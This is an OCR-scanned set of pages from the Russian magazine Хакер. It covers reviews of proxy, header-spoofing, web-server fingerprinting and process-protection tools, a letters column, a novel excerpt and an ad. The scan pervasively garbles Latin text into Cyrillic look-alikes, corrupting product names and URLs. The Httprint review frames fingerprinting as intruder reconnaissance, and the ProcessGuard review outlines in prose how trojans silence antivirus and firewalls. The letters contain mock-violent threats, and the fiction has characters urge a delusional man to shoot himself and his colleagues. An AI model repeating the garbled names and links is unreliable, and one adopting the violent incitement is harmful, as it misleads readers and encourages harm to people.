пункта: выделить все и отменить выделение. 
В целом РСМап ЕІІе Мападег понравится 
любителям ЫаиІІІиз'а, хотя можно предпо- 
ложить, что будет активно развиваться, и 
современная ипостась простака постепен- 
но перейдет в файловый менеджер уровня 
Кшзабег или МС. 

вшдкѵ ѵоіін'з з; 
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ТЕХТ СТЕПАН ИЛЬИН АКА ЗТЕР / 8ТЕР@САМЕІ_А№.ѴШ / 



Х-ТООІ-2 




Регтео Зесигііу Огіѵег 4.2.6 
ѴѴІп 95/98/М Е/2к/І\ІТ/ХР 
ЗИагеѴѴаге 
Зігѳ: 2,53 Мб 
ѵѵѵѵѵѵ. регтео. сот 

Странно, но многие сетевые программы почему-то не поддержи- 
вают работу через сокс/прокси. За примерами далеко ходить не 
надо: взять хотя бы популярнейший почтовый клиент ТИе Ваі!. 
Чтобы пустить почтовый трафик через оокс, приходится прибегать 
к помощи так называемых соксофикаторов: ЗоскСар ( «лотѵ.зоскз. 
пес. сот ) или РгееСар ( ѵталл/.ігеесар.ги ). Они отлично справляются 
с поставленной задачей, но в то же время вызывают некоторые 
неудобства. Во-первых, для каждой соксофицируемой програм- 
мы требуется отдельно задавать параметры перенаправления 
трафика, что довольно муторно. А во-вторых, приходится сначала 
запускать соксофикатор и лишь потом нужную программу. Обоих 
недостатков лишен другой подход, который реализован в продук- 
те Регтео Зесигііу Огіѵег. Он состоит из двух частей: низкоуровне- 
вого сетевого драйвера и специальной оболочки для его управ- 
ления. Драйвер незаметно устраивается в систему и начинает 
прослушивать весь сетевой трафик. В случае необходимости он 
автоматически инициирует подключение с ЗОСКЗ-сервером и 
инкапсулирует нужные сетевые пакеты через него. Одновременно 
с этим программы, не попадающие под правила соксофикации, 
продолжают работать без каких-либо изменений. 



Настройку драйвера стоит начинать с указания адреса и порта 
ЗОСКЗ-сервера. Далее возможны два варианта: либо соксофи- 
цировать все приложения (с учетом возможного списка исклю- 
чений), либо только несколько программ, которые необходимо 
сразу же обозначить. Раз осуществив конфигурирование драйве- 
ра, можно надолго забыть об его существовании. Просто запус- 
кай нужные тебе приложения и работай в обычном режиме. 

Для удобства пользователю предлагается на выбор несколь- 
ко конфигураций (Іп ОНІсе, Оиі оі ОІІІсе, ѴѴІгеІезз), каждая из 
которых может содержать собственные ЗОСКЗ-серверы и 
список соксофицируемых приложений. Переключение между 
конфигами, а также отключение соксофикации осуществля- 
ется практически мгновенно, с помощью иконки программы 
в системном трее. 




ВМОЗСІтапде ѵ2.0 Ьеіа 

ѴѴІп 95/98/М Е/2к/І\П7ХР 

Ргееѵѵаге 

Зіге: 239 Кб 

депі 1 .пагосі.ги 

Небольшая надстройка над популярными браузерами, а имен- 
но: Іпіегпеі Ехріогег, Рігеіох и МогіІІа. Каждый из них во время 
отправки НТТР-запроса, передает массу информации об 
используемом окружении: тип и версию операционной систе- 
мы, браузера, поддерживаемые языки и т.д. В некоторых случа- 
ях, когда необходимо оставаться инкогнито, раскрытие подоб- 
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ных параметров крайне нежелательно. Чтобы не засветиться, 
можно пойти двумя путями: установить виртуальную машину с 
нужной версией ОС, браузера, часовым поясом (большинство 
профи так и поступают) или же на лету редактировать систем- 
ные переменные, подставляя в них требуемые значения. Второй 
вариант существенно проще, особенно если знать о существо- 
вании программы ВМОЗСИапде. 

Для каждого из браузеров тулза предлагает обозначить зна- 
чения НТТР-заголовков. Например, в качестве ОС юзер может 
выбрать ѴѴІпсІоѵѵв ХР, ОеЬіап/1 .3.3, РгееВЗО 3.2 и т.д. — всего 
доступно несколько десятков наименований. Особенно порадо- 
вали варианты «Квант» и «Калькулятор ІѴІикроша», что свиде- 
тельствует о наличии у разработчика хорошего чувства юмора 
(еще бы, ведь он наш соотечественник). 

Для использования программы нужно учитывать один нюанс: 
перед внесением изменений следует в обязательном поряд- 
ке закрыть браузер. В противном случае даже перезагрузка 
к положительным результатам не приведет. Кстати, прове- 
рить правильность выполнения всех действий тебе помогут 
специальные сайты, такие как ѵѵѵѵѵѵ.ІеасІег.ги/зесигеЛл/Ііо.ІіІтІ 
или ѵѵѵѵѵѵ.детаІ.сІк/Ьгоѵѵзегзрѵ/ . Можно обойтись средства- 
ми самой программы. Для проверки ВМОЗСНапде запускает 
локальный веб-сервер, а от тебя требуется лишь в адресной 
строке браузера набрать 127.0.0.1 или ІосаІИозІ. После этого 
в одной из вкладок утилиты ты увидишь значения текущих 
НТТР-заголовков. 




тпт — 



НПргіпі 301 
ѴѴІпсІоѵѵз/РОЗІХ 
Ргееѵѵаге 
Зіге: 729 Кб 

ѵга/ѵѵ.пеі-здиаге.сот/ііііргіпі/ 

Выяснить как можно больше информации об удаленном серве- 
ре — одна из приоритетных задач взломщика. Многие наслы- 
шаны о феноменальных возможностях сканера Ыгпар, который 
с помощью функции Ііпдегргіпі умело определяет тип и даже 
версию удаленной ОС. Но с узкоспециализированными ути- 
литами знакомы, к сожалению, немногие. Сегодня я хочу рас- 
сказать о замечательной утилите НПргіпі, которая эффективно 
идентифицирует тип веб-сервера удаленной машины. 

Во время коннекта сервис выдает баннер, по которому тео- 
ретически можно определить используемое ПО. Но многие 
администраторы намеренно подделывают баннеры с помо- 
щью специальных патчей, модулей, например тосІ_зесипІу.с, 
и даже специализированного софта вроде ЗегѵегМавк ( ѵѵѵѵѵѵ. 
роП80зоИ'/ѵаге.сот ), чтобы сбить с толку хакера. Однако НПргіпі 
этим не проведешь. В своих исследованиях тулза НПргіпі опира- 
ется на уникальные сигнатуры, которые присуще каждой конк- 
ретной программе-серверу. Причем база программы не огра- 
ничивается сигнатурами для банальных АрасЬе, 135 и другого 
популярного софта. В нее также включена такая экзотика, как 
«отпечатки пальцев» веб-серверов, интегрированных в совре- 
менные роутеры, АОЗб-модемы, беспроводные точки доступа 
и т.д. Использование сервером защищенных 336-соединений 



также не является помехой для НПргіпі. Утилита автоматически 
распознает использование шифрования и продолжит скани- 
рование. Более того, она даже соберет всевозможную инфор- 
мацию об ЗЗІ_, в том числе данные по сертификатам и список 
используемых шифров. Для увеличения скорости сканирова- 
ния активно применяется работа в несколько потоков. Правда, 
функция тиІІІ-Птгеасііпд реализована пока только для линук- 
совых и виндовых версий программы. Поклонникам РгееВЗО 
придется немного подождать. Списки исследуемых серверов 
можно импортировать из текстового файла или отчета скане- 
ра ІЧтар. А отчеты о проведенном сканировании можно легко 
представить в НТМБ-, СЗѴ- и ХМБ-форматах. 




РгосеззСиагсі 3.15 
ѴѴІп 2ШТ/ХР 
ЗПагеѵѵаге 
Зіге: 1,8 Мб 

ІтІІр://ѵѵѵѵ\д/.сІіатопсІс8.сот.аи/ргосезздиагб/ 

Если посмотреть в характеристики приватных троянов, то обя- 
зательно увидишь там пункт следующего содержания: система 
невидима для всех популярных антивирусов (ежедневный мони- 
торинг КАВ, НАВ, МАКАФИ, N0032). Разработчики не врут. В 
большинстве случаев процессы файрвола и антивируса дейс- 
твительно можно особым образом модифицировать или вовсе 
выгрузить из памяти. Например, грамотный троян может деак- 
тивировать сканирующую часть антивируса, оставив в покое 
оболочку программы. В итоге пользователь будет испытывать 
ложное чувство безопасности, наблюдая все внешние признаки 
работы антивируса (по иконке в трее и т.д.), хотя реально никаких 
действий по поиску заразы осуществляться не будет. С файрво- 
лом еще проще: сообщение о ненормальной активности легко 
блокируется с помощью элементарных АРІ-функций, которые 
скрывают предупреждающее окно от пользователя и нажимают 
за него заветную кнопочку «разрешить подключение». 

Чтобы обезопасить себя хотя бы от небольшой части заразы, 
рекомендую установить утилиту РгосеззСиагсі. Самая главная 
функция программы — защита процессов от внешнего воз- 
действия. Она внимательно следит за всеми АРІ-вызовами и 
тем самым предотвращает любое несанкционированное отклю- 
чение или модификацию запущенных приложений. Более того, 
РгосеззСиагсі блокирует глобальные хуки и попытки инжектиро- 
вания опасного кода в привилегированные задачи. Можно так 
настроить РгосеззСиагсі, что приложения будут запускаться толь- 
ко после одобрения пользователя. А непрерывное логирование 
файлов, отданных на исполнение, поможет впоследствии отло- 
вить пропущенную заразу. Но это еще не все. Основная часть 
программы работает на уровне ядра, поэтому ей не составляет 
труда распознать руткиты, которые также хотят установить в сис- 
тему низкоуровневые драйвера. Я попробовал заинсталлить два 
популярных руткита, и РгосеззСиагсі с доблестью распознал их. 
Везресі! 

вінднѵ ѵоик Б лг 
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е-гпаіі 



ВРАЧ-ТЕРАПЕВТ 

Вскрытие писем провел 
Ог.КІоипіг (гтадаапе@геа1.хакер.ги) 



Ргот: Эгоп Огописй [кс)ѵ_рго @ таіі.ги] 

5иЬ|: ** *От тупых читателей !!! 

Привет !!! 

Ваш журнал нам очень нравится особено 90% бесполезной 
информации каторую вы нам выкладываете !!! 10% же про- 
центов действительно полезной информации нам не надо 
мы ее не понемаем ... да и вы наверное теже ???. РЕКЛА- 
МА чтож всем хочется есть не спорю, НО ЕЕ ОЧЕНЬ МНО- 
ГО И! Ладно парни удачи с вашим ПСЕВДОХАКЕРСКИМ 
журналом !!! 

С уважением ВАШЫ тупые читатель !!! 

Ве: Спасибо, чувак! Давай я отвечу на твое письмо от име- 
ни всех живых и придуманных мировых интеллектуалов, 
а ты догадаешься, кто из них кто. На выбор — РаІІОиІ в пе- 
реводе «Черного Рассвета», «Бивис и Баттхед», «Аллоды 2: 
повелитель душ» и еще кое-кто. 

Прасти, Грэмпи-кость говорит убивай и потом еще убивай. 
Моя пошол. Взаправду жжошь. Песьмо твое не осилил, 
бальшое. Пешы ещо Моя тролль, моя глупый, моя думать 
не любить. Эльфа — умный, мне сказать — твоя хороший 
человек Гы, Бивис, отстойное письмо. Хе-хе. Кстати, эти 
длинные тире в журнале напоминают мне то, что у меня 
в штанах, гы 

Ргот: - 
5иЬ|: — 

Хайа, пипели! 

Хочу с огорчением отметить, что ваш журнал из номера 
в номер становится скучнее и скучнее... =(. Надо как-то 
повеселить читателей... 

Все последующие пункты стоит снимать на видеокамеру 
(кое-где в режиме ночной съемки) и выложить видео на диск. 

1) Отбираем у Эг. КІоипіга очки. 

2) Бреем Куттера налысо. 

3) Запираем обоих в темном (спасибо Холоду, перегрыз- 
шему в свое время проводку) редакционном подвале 
(разбросав кое-где колюще-режущих принадлежностей, 
отравленных игл и медвежьих капканов). Можно пообе- 
щать, что оставшегося в живых выпустят. Если в течение 
7 дней их останется двое, можно запустить к ним кайма- 
на. В надзиратели поставить Даню, вооружив его автома- 
том Холода. 

4) Иногда кормить (семь дней-то они должны протянуть, 
до каймана?), подмешав в пищу ЛСД. Из напитков да- 
вать разведенный технический спирт, в котором выма- 
чивали мухоморы. 

5) Если Майндворк начнет писать в «Хумор» — отпра- 
вить его в тот же подвал (можно дать автомат Холода, но 
с холостыми патронами). 

Знаете с какой скоростью журнал раскупать будут? 

З.Ы. На что угодно спорю — Купер это не пропустит в печать. 

Респект и уважуха, Аріх. 

Ве: Приветствую, дорогой креативщик! Вижу-вижу, что 
глубоко, из темных глубин небытия повыползали ста- 
рые-добрые фанаты Хакера, и зло из их душ пока не вы- 
ветрилось, а наоборот, закалилось на долгие годы под- 
земной жизни. Смотрю я, что ты не сторонник добрых и 
милых шуток, которые так люблю я. За это тебе полага- 
ется бонус. Однажды, когда ты этого менее всего бу- 



дешь ждать, Никитос подсыпет тебе в пищу немного пы- 
ли из стигийской гробницы, а может быть, много сока 
черного лотоса, как знать. А потом мы побреем тебя на- 
лысо, сделаем небольшую дырку в животе и поселим 
там африканских опарышей, смешанных с личинками 
Вольфартовой мухи. Да-да, той самой мухи, личинки ко- 
торой прогрызают длинные и запутанные ходы в мягких 
тканях. А потом мы наденем тебе на голову малиновые 
кальсоны, подарим бюст Льва Толстого и полкило полта- 
вской колбасы и сунем в редакционный подвал, где жи- 
вет беспокойная тень Холода, где ты и будешь прозябать 
на грани жизни и смерти целую вечность. 

Ргот: Иван Головинов [фдгісШ таіі.ги] 

5иЬ|: спасибо&2 ремйка 

Привет ХАКЕРЫ спасибо громадное за ответ по восста- 
новлению файлов на отформатированном винте. По по- 
воду музыки даю для вашего журнала 
2 римейка 

1- ТоЬу&Ргеба-МауЬе (ПрОгісІ Ветіх) 

2- сІеасІтаи5-ТІтаІзМоІТгие (0]-ѲгісІ Эгеат ЕІесіго Петіх) 
Находится это на бНр://ѵѵѵѵѵѵ.геаІти5Іс.ги/сІіагісІ 
просто скачайте можете и фотку взять 

Будет что-то еще — пришлю. 

Пока. 

Ве: Ты совершенно прав насчет того, что спасибо в кар- 
ман и постель не положишь и на хлеб не намажешь. Кро- 
ме того, такого пива, как «спасибо», тоже не существует. 
Но в конкретном случае лично я готов обойтись устной 
благодарностью, поскольку слушать римейки у меня лич- 
но нет желания :(. Если хочешь сделать доброе дело — 
пришли песню группы Ноіу Огадопз «Песнь странника» 
в хорошем качестве. 

Ргот: ТеКО [РІтепХ@1геетаіІ.и2] 

5иЬ|: Свободная 

Ну здравствуйте компьютерные хулиганы, создающие 
журнал ][акер. 

Передайте пару ласковых слов редактору Хакер 
Поменьше АЖЫПАГ в журнале творите 
Получше на буквы меж строчек смотрите 
Поменьше статеек с инета качайте 
Уж лучше про жизнь свою поболтайте 
Чтоб было не скучно журнал ваш читать 
Неплохо б немного приколов кидать 
На этом с критикой можно КОНЧАТЬ 
Советую вам на Е-МаіІ отвечать 
Приятно читать ваши скромные строчки 
На этом пожалуй поставлю я точку. 

Ве: Спасибо за стихотворение, Свободная! Кстати, твой 
ник у меня почему-то ассоциируется не с сексуальной 
распущенностью, а с переводом слова РгееМап в одной 
из локализаций Оипе 2000. Бомж :)). Я бы тебе с удоволь- 
ствием ответил тоже стихами и даже кое-что попробовал 
написать, но получилось некрасиво. Не сподобил меня 
писать стихи Всевышний, но я об этом и не жалею :). 

Могу тебе подарить только вот эту поэму под названием 
«Сифилиада» 

ІПІрѴ/'ллд/ѵѵ.песІиа.ги/ІІЬ/гезІ/зІісІі/ОІ осІ/ЬоокЗ/Ьоок.ІПт . 
ведь она написана самим юным Ботвинником. 

ВІЧДКѴ ѴОІЛѴ5 ЗС 
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ТАБЛ ЦИКЛОН 



ТЕХТ ДАНЯ ШЕПОВАЯОВ / кеу@с1апуа.ги / 



АРВОАСНІМО І_ЕѴЕІ_ 3 /// СМЕРТЬ АВТОРА 



МЫ ПРОДОЛЖАЕМ ПУБЛИКОВАТЬ 
ОТРЫВКИ ИЗ ЛЕСБИЙСКОГО СТРИПТИЗ- 
РОМАНА ДАНИ ШЕПОВАЛОВА 
«ТАБА ЦИКЛОН». ПОДРОБНОСТИ 
НА УУУУУУ.РАЫУАЯЦ . 

Когда в дверь профессора Быданова позвони- 
ли, тот сидел на полу в гостиной и задумчиво те- 
ребил вывалившуюся паркетину, на поверхнос- 
ти которой были уже едва различимы следы ла- 
ка. Голоса в голове профессора говорили, что 
он все делает неправильно. Всего было четыре 
голоса, их наводил специальный прибор, встро- 
енный спецслужбами в телевизор. Голоса де- 
журили посменно, сейчас была очередь ста- 
рушки. «Ты должен жениться на Анне!», - твер- 
дила она. - «Ты должен жениться на Анне!». В 
дверь снова позвонили, на этот раз уже настой- 
чивее. 

Через минуту Тима и Рита уже изучали жилище 
профессора. Громоздкая лепнина на потолке 
была покрыта мелкими трещинами и слоем не- 
понятно откуда взявшейся копоти. Старое пиа- 
нино придвинуто к стене, вокруг штабелями 
сложены прямоугольные свертки, упакованные 
в грубый серый картон с масляными разводами 

— видимо, тираж одной из научных моногра- 
фий философа. 

За окном прогрохотал трамвай, заставивший 
звонко задрожать пыльные двойные стекла. В 
пустом пространстве между ними мирно покои- 
лись кверху лапками засохшие комары и мухи. 

— А в чем, собственно, дело? - спросил про- 
фессор. 

Рита протянула философу экзаменационный 
листок, внизу которого красной ручкой было 
выведено «Незачет! Профессор Быданов». 

— Это ты написал? 

— Позвольте... - философ взял листок в руки 
и, близоруко щурясь, поднес его почти к самым 
глазам. - Так-так... Да, я. 

— И чем тебе не понравилась работа этой де- 
вушки? — спросила Рита. 

— Кхм... - Быданов машинально оттянул боль- 
шими пальцами рук свои широкие клетчатые 
помочи и тут же отпустил их. Подтяжки громко 
хлопнули о грудь профессора. - Оля не раск- 
рыла сущность герменевтики. Герменевтичес- 
кого подхода. 

— Кого-кого? - переспросил Тима. 

— Герменевтики, - повторил Быданов, почему- 
то смутившись, и растерянно опустился на край 
кровати. 

— Ну хорошо, и в чем же тогда суть герменев- 
тического подхода? 

Профессор испытал давно забытое ощущение: 
будто бы он студент, безнадежно заваливаю- 
щий экзамен, и преподаватель дает ему пос- 



ледний шанс, задавая неприлично простой воп- 
рос. Философ поднялся с пола и с нескрывае- 
мым возбуждением принялся мерить шагами 
гостиную. С каждым новым шагом он чувство- 
вал себя все увереннее. 

— Молодой человек, это беседа не на час и не 
на два, — Быданов остановился, вновь продел 
большие пальцы рук под помочи и принялся ед- 
ва заметно раскачиваться на носках взад-впе- 
ред, привычно входя в лекторский тон. — Тут 
нужно начинать с истоков, рассма... 

— Ясно, - оборвал его Тима. - Рита, а ты мо- 
жешь быстро рассказать? 

— Конечно, могу, - ответила девушка. - Только 
я лучше на примере объясню. 

— Давай, - согласился Тима. 

— В школе у нас был один мальчик, ну такой, 
немножко не в себе, - Рита выразительно пос- 
мотрела на Быданова, тот вновь смутился, - 
звали его Г риша. И однажды на перемене, пока 
в классе никого не было, Гриша построил на 
парте замок из дерьма... Очень красивый, надо 
сказать, замок. С башенками такой, с балкон- 
чиками. После звонка все вернулись в класс и, 
разумеется, принялись над Гришей смеяться. А 
учительница сразу в крик: что за гадость, что за 
мерзость, а ну быстро убери... Гриша был пос- 
лушным мальчиком, он сгреб свой замок на тет- 
радку и понес все это добро в туалет. Несет до- 
вольный, улыбается, а с тетрадки на пол капает 

— кап-кап. Но Гриша все равно благополучно 
доставил свой ценный груз, выкинул, пошел на- 
зад, и видит, что весь пол в этих сочных капель- 
ках. Какой бы он дурак ни был, а понял, что ник- 
то его за испачканный пол не похвалит. И вот 
тогда Гриша придумал совершенно гениальный 
выход из ситуации. — Чтобы подчеркнуть важ- 
ность гришиного открытия, Рита подняла указа- 
тельный палец вверх и даже посмотрела на не- 
го. Быданов последовал ее примеру и тоже пос- 
мотрел на палец девушки, будто бы за ним пря- 
тались ответы на все невысказанные вопросы, 
касающиеся его новых знакомых. 

— Ну, так что же он сделал? - нетерпеливо 
спросил Тима. 

— Г риша разорвал тетрадный лист на множест- 
во маленьких клочков и принялся по очереди 
накрывать ими каждую капельку. Одна капель- 
ка - одна бумажка. 

— Феноменально! - вдруг завопил Быданов, с 
восторгом глядя на девушку. - Это же и есть 
герменевтический подход! На каждую капельку 



дерьма наклеить по бумажке! В яблочко! Я бы 
никогда так доступно объяснить не смог... Ни- 
когда! Очень вы красочно рассказываете. 
И очень верно. Вас бы к нам в университет пре- 
подавать... 

Рита благодарно улыбнулась философу. Потя- 
нулась, подняв вверх свои узкие загорелые за- 
пястья. Перехватила взгляд Тимы, который бес- 
покойно смотрел на часы. 

— Шесть часов, - сказал мальчик. - Сейчас но- 
вости начнутся. 

— Нас там должны показать, - доверительно со- 
общила Рита профессору. - Мы денег немнож- 
ко украли. - Она кивнула на рюкзак Тимы и нап- 
равилась к телевизору. Включила его, утопив 
в передней панели овальную черную кнопку. 
«Все дело в том, что у нее нет иноземной ау- 
ры!», -донесся из ожившего динамика суровый 
мужской голос. 

— Нет-нет! Ни в коем случае! - профессор со 
всех ног бросился к телевизору и выключил его 
еще до того, как изображение на экране окон- 
чательно прояснилось. - Не включайте! Нельзя 
включать! 

— Почему? - удивилась Рита. 

— Поверьте, на это есть причины, - неохотно 
сказал Быданов. 

Ответ профессора Риту явно не удовлетворил: 

— Расскажите, мы настаиваем! Я же вам рас- 
сказала про герменевтику... 

— Ну, хорошо... Хорошо... - Быданов на цыпоч- 
ках пробрался к электрической розетке и вырвал 
из нее силовой кабель, идущий от телевизора. 
Затем подумал еще немного и развернул теле- 
визор экраном к стене. Бордовая атласная 
подстилка под ним пошла широкими складками. 

— Они установили туда специальный прибор! - 
шепотом сказал профессор. - Они хотят, чтобы 
я женился! 

— Кто это - «они»? - удивилась Рита. - Движе- 
ние «За вырождение нации»? 

— Нет! - профессор зажмурился и яростно за- 
махал перед собой раскрытой ладонью, будто 
бы стирая невидимой тряпкой последнюю фра- 
зу девушки. Затем красноречиво указал паль- 
цем вверх и на выдохе произнес: 

— Спецслужбы! 

— Глупости! - сказала Рита. - Спецслужбы уже 
давно не встраивают такие приборы в телеви- 
зоры. Это слишком хлопотно и дорого. Пять лет 
назад в Коломягах целый комплекс построили. 
Полукилометровая такая коробка без окон и с 



ХАКЕР 02 /87/ 06 



191 



«ТАБА ЦИКЛОН» — ПЕРВЫЙ РОМАН ДА- 
НИ ШЕПОВАЛОВА. ЭТА КНИГА ПОХОЖА 
НА СТРИПТИЗЕРШУ. НА САМОВЛЮБ- 
ЛЕННУЮ ЗВЕЗДУ ДОРОГОГО МУЖСКО- 
ГО КЛУБА. ОНА ОБЛОКОТИЛАСЬ НА ВЫ- 
СОКИЕ ПЕРИЛА, СМОТРИТ НА ВЫСТУП- 
ЛЕНИЕ ДРУГОЙ ДЕВУШКИ И ДЕЛАЕТ 
ВИД, ЧТО ТЫ ЕЕ НЕ ИНТЕРЕСУЕШЬ. НА- 
ЧИНАЯ С ЭТОГО НОМЕРА, ХАКЕР ВМЕС- 
ТЕ С ДАНЕЙ БУДУТ РАЗДЕВАТЬ ЕЕ ДЛЯ 
ТЕБЯ. ПОДРОБНОСТИ НА УУУУУУ.РАЫУАЛЦ . 



вентиляторами. Она на весь город работает 
и еще часть ленинградской области захватыва- 
ет, до Петродворца. Так что телевизора вы со- 
вершенно напрасно боитесь! 

— Правда? - с надеждой спросил профессор. 

— Конечно! - успокоила его девушка. — Телеви- 
зоры тут абсолютно ни при чем. А вы столько все- 
го теряете! Мне кажется, давно уже пора отменить 
школы и университеты. Самые ценные знания лю- 
ди получают именно благодаря телевидению. 

— Это какие же, например, ценные знания? - 
заинтересовался Быданов. 

— Например... - Рита ненадолго задумалась, - 
ну, например, если ребенок случайно проглотит 
стиральный порошок или какое-нибудь чистя- 
щее средство, то его ни в коем случае нельзя 
отпаивать водой... 

Быданов открыл рот, потрясенный новой ин- 
формацией. 

— Такого ни из одной книги не узнаешь, - про- 
должала девушка. - Вот в вашей книге, напри- 
мер, о чем написано? - Рита взяла с пианино 
монографию профессора. «Смерть Автора. Бы- 
данов Н. П.». Вот кому это все нужно? Зануд- 
ство какое-то... 

— А про что там написано? - спросил Тима. 

— Про смерть автора, - охотно ответила девуш- 
ка. - Что автор умер, и остался только один чи- 
татель, дескать, что хотел сказать автор - уже 
неважно, важна лишь интерпретация. 

— Подожди-подожди! - остановил ее Тима. - 
Быданов, ты чего, серьезно так думаешь? 

— Ну. Так, - как-то не очень уверенно ответил 
философ. - Это ведь не я придумал. Я система- 
тизировал, что ли... 



— Да ты о#@ел! - взорвался Тима. - Как ты во- 
обще можешь думать что-то, если тебя самого 
придумали! Тебя Даня придумал, автор вот это- 
го всего, а ты говоришь, что он умер? 

— Я... Не знаю... Я... Меня... 

— Что «меня»? - передразнил философа Тима. 

— Да знаешь, что Даня думает обо всей этой 
твоей смерти автора? 

— Что? - оживился Быданов. Любое мнение по 
поводу его работы было профессору небезраз- 
лично. 

— Он на нее х@й клал! 

Рита демонстративно заткнула уши средними 
пальчиками и укоризненно посмотрела на Тиму. 

— Как это? - удивился профессор. 

— Очень просто. Без всяких интерпретаций, а 
по-настоящему, совершенно буквально — взял 
и положил на нее свой авторский х@й! Причем 
не очень чистый, потому что воду горячую отк- 
лючили. 

— У меня тоже отключили, - растерянно произ- 
нес философ. 

— Неважно, - отмахнулся Тима. - Главное, что 
автор, о смерти которого ты написал, он и сей- 
час кладет на все это х@й. Вот, сам посмотри! - 
мальчик показал пальцем на монографию, ко- 
торую Рита держала в руках. Вернее, на сирот- 
ливое пустое пространство, которое девушка 
все еще обнимала пальцами. «СМЕРТЬ АВТО- 
РА» куда-то исчезла. На пианино ее не было, на 
полу - тоже. Куда могла за одно мгновение ис- 
париться объемная монография, Быданов ре- 
шительно не понимал. 

— В общем так, - Рита ласково положила руку 
философу на плечо. - Вы же теперь сами знае- 



те, что делать? 

— Что? Делать? - потерянно спросил профессор. 

— Как это что? - Рита искренне удивилась не- 
пониманию философа. - Застрелиться, конеч- 
но же! Вот вам пистолет, - девушка расстегну- 
ла молнию на рюкзаке и достала оттуда краси- 
вый серебристый пистолет. Следом из рюкзака 
высыпалось на пол несколько крупных бума- 
жек: какие-то иностранные деньги, на каждой 
купюре был изображен портрет приятной пожи- 
лой женщины. 

— Застрелиться? - тихо переспросил профес- 
сор, ощутив в руке холодную, емкую, зовущую 
тяжесть. 

— Ну разумеется! Что же вы все вопросы зада- 
ете, вы же ученый, вы ответы должны давать! А 
у вас там в обойме девять замечательных отве- 
тов! Себе на все вопросы ответите и коллегам 
своим заодно. Я думаю, вы сами знаете, кому 
нужно. 

— Да. Знаю! - неожиданно обрадовался про- 
фессор. 

— Отлично! - подбодрила его Рита. - Тогда впе- 
ред! А то нам ночевать негде. Мы тут у вас оста- 
новимся пока, вы же не возражаете? 

— Нет! Конечно же, нет! - в глазах профессора 
начали разгораться угольки фанатизма. - Рас- 
полагайтесь. Будьте как дома. Уж будьте спо- 
койны, я им всем... - профессор восторженно 
потряс пистолетом перед лицом Риты. - Я им 
всем отвечу! Всем этим дармоедам! Всей этой 
кафедре методологии, - Быданов в необычай- 
ном возбуждении выбежал в коридор, затем 
впопыхах вернулся назад, будто забыл что-то, 
но тут же махнул рукой и скрылся вновь. 
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МОВИЕ 

ТЕСНЫОЮСѴ 




Ноутбук 50* ОѴѴ 36 



50® на базе 

технологии Іпіеі® Сепітіпо™ 
для мобильных ПК 



■ размер и разрешение экрана 15.4" 

\Л/5ХСА+( 1680x1 050) 

■ встроенный проигрыватель (возможность 
проигрывания дисков без загрузки системы) 

■ устройство чтения карт памяти 

■ беспроводная сеть ѴѴІРі 

■ встроенный ЫиеІооіН 

■ сумка в комплекте 
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торговли (27) 68-02-79 г. Северодвинск м-н "Техномир"(8184) 527-000, (8184) 52-80-94 г. Архангельск «Группа Север» (8182) 66-19-61 
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Обозначения Сеіегоп, Сеіегоп Іпзісіе, Сепітіпо, Сепігіпо Іодо, Соге Іпзісіе, Іпіеі, , Іпіеі Соге, Іпіеі Іодо, Іпіеі Іпзісіе, Іпіеі Іпзісіе Іодо, Іпіеі ЗреесіЗІер, Іпіеі Ѵііѵ, Іпіеі Хеоп, Ііапіит, Ііапіит 
ІпзісІе, Репііит и Репііит Іпзісіе являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее 
подразделениям на территории США и других стран. 







